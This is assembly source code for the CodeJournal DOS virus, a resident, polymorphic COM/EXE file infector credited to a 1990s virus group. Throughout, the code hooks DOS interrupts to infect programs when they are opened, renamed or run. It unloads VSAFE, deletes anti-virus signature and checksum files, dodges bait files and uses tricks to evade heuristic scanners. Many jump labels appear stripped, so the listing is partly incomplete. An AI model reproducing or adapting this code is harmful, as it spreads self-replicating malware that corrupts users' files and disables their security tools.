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synced 2024-12-19 01:46:09 +00:00
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589 lines
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; CodeJournal virus, (c)1995 <20>irogen [NuKE]
; Polymorphic, Resident, Parastic EXE/COM Fast Infector. This is
; another one of my fuck-Invircible viruses. It uses absolutly
; no stealth techniques, yet successfully piggybacks invircible.
; Anti-Invircible Code
; ----------------------
; Completly defeats InVircible's v6.02 Anti-Piggybacking
; Avoids Bait Files
; Doesn't infect InVircible executables
; Deletes Invircible v6.02 signature files no matter what name they have
; Searches for and deletes them on set dir (21h/3Bh) call
; The Rest
; ----------------------
; Polymorphism is <20>iCE v0.5
; Infects on: Open (3Dh), Rename (56h), Ext. Open (6Ch), Execute (4Bh)
; Doesn't infect executables ending in 'AN', 'OT', 'AV', 'NU', or 'ND'.
; Attempts to get DOS 21h vector by assuming offset is 109Eh in DOS seg.
; Deletes all signature/recovery files known to man
; TBSCAN doesn't flag COM files at all because of my patented JMP construct
; Only subtracts from total memory when DOS allocate memory (49h) is called
; ..and then the usual shit..
cseg segment
assume cs: cseg, ds: cseg, es: cseg, ss: cseg
signal equ 063ABh
buf_size equ 850
vice_size equ 1993+buf_size
virus_size equ (offset vend-offset start)+VICE_SIZE
max_iv_size equ 256*66 ; maximum size a signature file
; can be, speeds up search.
; can't contain more than 256
; records
extrn _vice: near
org 0h
call get_bp ; get relative offset
push ds es ; save segments for EXE
inc si ; SI!=0
mov ax,signal
int 21h
or si,si
jz no_install
mov dx,5945h ; remove VSAFE from memory
mov ax,3D02h
add ax,0FA01h-3D02h
int 21h
mov cs:int_busy[bp],0 ; reset interrupt busy flag
mov ax,ds ; PSP segment
dec ax ; mcb below PSP m0n
mov ds,ax ; DS=MCB seg
mov al,'Z'+1 ; fuck heuristics
dec al
cmp byte ptr ds: [0],al ; Is this the last MCB in chain?
jnz no_install
sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB
sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP
mov es,word ptr ds: [12h] ; get high mem seg
push cs
pop ds
mov si,bp
mov cx,virus_size/2+1
xor di,di
rep movsw ; copy code to new seg
xor ax,ax
mov ds,ax ; null ds
push ds
lds ax,ds: [21h*4] ; get 21h vector
mov es: word ptr old21+2,ds ; save S:O
mov es: word ptr old21,ax
pop ds
mov ds: [21h*4+2],es ; new int 21h seg
mov ds: [21h*4],offset new21 ; new offset
pop es ds ; restore ES DS
xor ax,ax ; null regs
xor bx,bx
xor dx,dx
cmp cs: is_exe[bp],1
jz exe_return
lea si,org_bytes[bp] ; com return
mov di,0100h ; -restore first bytes
mov cx,3
rep movsb
xor di,di
xor si,si
mov cx,100h ; jump back to 100h
push cx
_ret: ret
xor di,di
xor si,si
mov cx,ds ; calc. real CS
add cx,10h
add word ptr cs: [exe_jump+2+bp],cx
add cx,cs:orgss[bp] ; calc. real SS
mov ss,cx
mov sp,cs:orgsp[bp] ; restore SP
int 3 ; fix prefetch
db 0eah
exe_jump dd 0
is_exe db 0
int 3
pop bp
push bp
sub bp,offset nx
; resident infection function
cmp ah,6ch+1 ; from extended open?
jnz not_extended
mov dx,si
mov di,dx
mov al,'.'
mov cx,0FFh
repnz scasb
or cx,cx
jnz got_ext
cmp word ptr [di],'oc'
jz is_exec
cmp word ptr [di],'OC'
jz is_exec
cmp word ptr [di],'xe'
jz is_exec
cmp word ptr [di],'XE'
jz is_exec
cmp word ptr [di-3],'DN' ; *ND
jz is_bad
cmp word ptr [di-3],'NA' ; *AN
jz is_bad
cmp word ptr [di-3],'VA' ; *AV
jz is_bad
cmp word ptr [di-3],'TO' ; *OT
jz is_bad
cmp word ptr [di-3],'UN' ; *NU
jz is_bad
push ds
xor ax,ax
mov es,ax
lds ax,es: [24h*4]
mov cs: save24ip,ax ; save 24h
mov cs: save24cs,ds
lds ax,es: [21h*4]
mov cs: save21ip,ax ; save 21h
mov cs: save21cs,ds
mov es: [24h*4+2],cs ; write new 24h
mov es: [24h*4],offset new_24
push es
mov ah,52h ; get DOS segment
int 21h
pop ds
mov si,109Eh ; assume 109Eh
cmp es: [si],09090h ; is DOS vecor?
jnz not_dos
mov ds: [21h*4],si ; write new 21h
mov ds: [21h*4+2],es
pop ds
push cs
pop es
mov al,0 ; get phile attribute
call attrib_file
push cx ; save CX-attrib
mov al,1 ; null attribs
xor cx,cx
call attrib_file
mov al,2
call open_file
jc dont_do
push cs
pop ds
mov cx,1ah
lea dx,org_bytes
call read_file
mov al,0 ; get time/date
call date_file
push cx dx
cmp byte ptr org_bytes,'M'
jz do_exe
cmp byte ptr org_bytes,90h ; InVircible bait?
jz close
cmp byte ptr org_bytes,0E9h ; us? / invircible bait?
jz close
mov is_exe,0
call offset_end
cmp ax,0FFFFh-virus_size ; file too big?
ja close
push ax ; AX=end of file
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor/
push di ; encrypted code. (at heap)
mov cx,virus_size ; CX=virus size
mov dx,ax ; DX=EOF offset
add dx,100h ; DX=offset decryptor will run from
mov al,00000011b ; garbage, no CS:
call _vice ; call engine!
pop dx
call write_file
call offset_zero
pop ax ; restore COM file size
sub ax,3 ; calculate jmp offset
mov word ptr new_jmp+1,ax
lea dx,new_jmp
mov cx,3
call write_file
pop dx cx ; pop date/time
mov al,01 ; restore the mother fuckers
call date_file
pop cx ; restore attrib
mov al,1
call attrib_file
call close_file
xor ax,ax
mov es,ax
lds ax,dword ptr cs: save24ip ; restore shitty DOS error handler
mov es: [24h*4],ax
mov es: [24h*4+2],ds
lds ax,dword ptr cs: save21ip
mov es: [21h*4],ax
mov es: [21h*4+2],ds
cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0?
jnz close ; could be iv bait if not
cmp byte ptr exe_header[18h],52h ; pklite'd?
jz exe_ok
cmp byte ptr exe_header[18h],40h ; don't infect new format exe
jge close
mov ax,word ptr exe_header[0Ah] ; get minimum memory
cmp word ptr exe_header[0Ch],ax ; if max mem=min mem then ok
jz exe_ok
cmp byte ptr exe_header[0Ch],0FFh ; max memory FFFFh?
jnz close
push bx
mov ah,2ch ; grab a random number
int 21h
mov word ptr exe_header[12h],dx ; mark that it's us
mov is_exe,1
les ax,dword ptr exe_header[0eh] ; get old SS:SP
mov word ptr orgss,ax ; not reversed
mov word ptr orgsp,es
les ax,dword ptr exe_header[14h] ; Save old entry point
mov word ptr exe_jump, ax
mov word ptr exe_jump+2, es
push cs
pop es
call offset_end
mov cx,10h ; divide by 16
div cx
sub ax, word ptr exe_header[8] ; subtract header size
mov word ptr exe_header[14h],dx ; new cs:ip
mov word ptr exe_header[16h],ax
inc ax
mov word ptr exe_header[0eh],ax ; new SS
mov word ptr exe_header[10h],0F000h ; new SP
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor & code
mov cx,virus_size ; CX=virus size
mov al,00000010b ; garbage, use CS:
call _vice ; call engine!
pop bx ; pop handle
mov dx,virus_size
call write_file ; append virus
call offset_end ; get adjusted file size
mov cx,512 ; divide by 512
div cx
inc ax ; add a page
mov word ptr exe_header+4,ax ; save new size
mov word ptr exe_header+2,dx
call offset_zero
mov cx,18h ; write fiXed header
lea dx,exe_header
call write_file
jmp close
xor al,al
jmp set_fp
mov al,02h
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
mov ah,3dh
int 21h
xchg ax,bx
mov ah,3eh
int 21h
mov ah,3fh
int 21h
mov ah,40h
int 21h
mov ah,43h
int 21h
mov ah,56h
int 21h
cmp ax,signal ; be it us?
jnz nchk ; richtig..
xor si,si
cmp cs:int_busy,1 ; are we already in int?
jz jmp_no_stack
mov cs:int_busy,1 ; now we are
inc ah ; fuck heuristics
cmp cs: fix_mem,1 ; need to fix memory?
jz add_mem
cmp ah,48h+1 ; allocate memory?
jz sub_mem
cmp ah,3Bh+1 ; set dir?
jz kill_anti_virus
cmp ah,4bh+1 ; execute phile?
jz go_infect
cmp ah,3dh+1 ; open phile?
jz go_infect
cmp ah,6ch+1 ; extended open?
jz go_infect
cmp ah,56h+1 ; rename/move phile?
jnz jmp_org
call push_regs
call infect_file
call pop_regs
dec cs:int_busy ; not busy anymore
dec ah ; restore function
db 0eah ; jump far XXXX:XXXX
old21 dd 0
pop si
jmp jmp_org
mov cs: fix_mem,0
push ax ds
xor ax,ax
mov ds,ax
add byte ptr ds: [413h],((virus_size+1023)*2)/1024 ;+totalmem
pop ds ax
jmp jmp_org
mov cs: fix_mem,1
push ax ds
xor ax,ax
mov ds,ax
sub byte ptr ds: [413h],((virus_size+1023)*2)/1024 ;-totalmem
pop ds ax
jmp jmp_org
call push_regs
push cs
pop ds
mov ah,2fh ; get DTA
int 21h
push bx es ; save DTA
push cs
pop es
lea dx,ff_info
call set_dta
mov cx,16h ; include all attribs
lea dx,inv_spec
mov ah,4eh
int 21h ; findfirst
jnc inv_loop
jmp inv_done
lea si,f_name
push si
mov dx,si
cmp word ptr [si+4],'V-' ; ANTI-VIR.DAT?
jz is_anti
cmp word ptr [si+8],'SM' ; CHKLIST.MS?
jz is_anti
cmp word ptr [si+8],'PC' ; CHKLIST.CPS?
jz is_anti
cmp f_sizeh,0 ; high word set?
jnz findnext
cmp f_sizel,max_iv_size ; too big?
jg findnext
mov al,0
call open_file
jc findnext
mov byte ptr inv_buf,0
mov cx,44h
lea dx,inv_buf
call read_file
cmp ax,44h
jz record_s
mov ax,word ptr inv_buf
mov word ptr inv_buf[42h],ax
call close_file
lea si,inv_buf
call chk_iv ; check first record
jnz findnext
lea si,inv_buf[42h]
call chk_iv ; check second record
jnz findnext
mov al,1 ; reset attribs
xor cx,cx
call attrib_file
mov ah,41h
lea dx,f_name
int 21h
mov al,0 ; null out filename
pop di ; di-> fname
mov cl,13
rep stosb
mov ah,4fh
int 21h
jc inv_done
jmp inv_loop
pop ds dx ; restore DTA
call set_dta
call pop_regs
jmp jmp_org
mov ah,1ah
int 21h
cmp word ptr [si],'ZM'
jz yea_iv
cmp word ptr [si],'KP'
jz yea_iv
cmp word ptr [si],0EA60h
mov cs:_bp,bp
pop bp
push ax bx cx di dx si ds es
push bp
pop bp
pop es ds si dx di cx bx ax
push bp
mov bp,cs:_bp
new_24: ; critical error handler
mov al,3 ; prompts suck, return fail
inv_spec db '*.*',0
credits db 'CodeJournal by <20>irogen [NuKE]'
orgss dw 0 ; original SS:SP in exe
orgsp dw 0 ;
fix_mem db 0
new_jmp db 0E9h,0,0 ; jmp XXXX
rel_off dw 0
org_bytes db 0CDh,20h, 6 dup (0) ; original COM bytes | exe hdr
db 13h dup(0) ; remaining exe header space
save21ip dw 0 ; infected int21h vector
save21cs dw 0
save24ip dw 0 ; old int24h vector
save24cs dw 0
_bp dw 0
int_busy db 0
ff_info db 26 dup(0)
f_sizel dw 0
f_sizeh dw 0
f_name db 13 dup(0)
inv_buf db 44h dup (0)
cseg ends
end start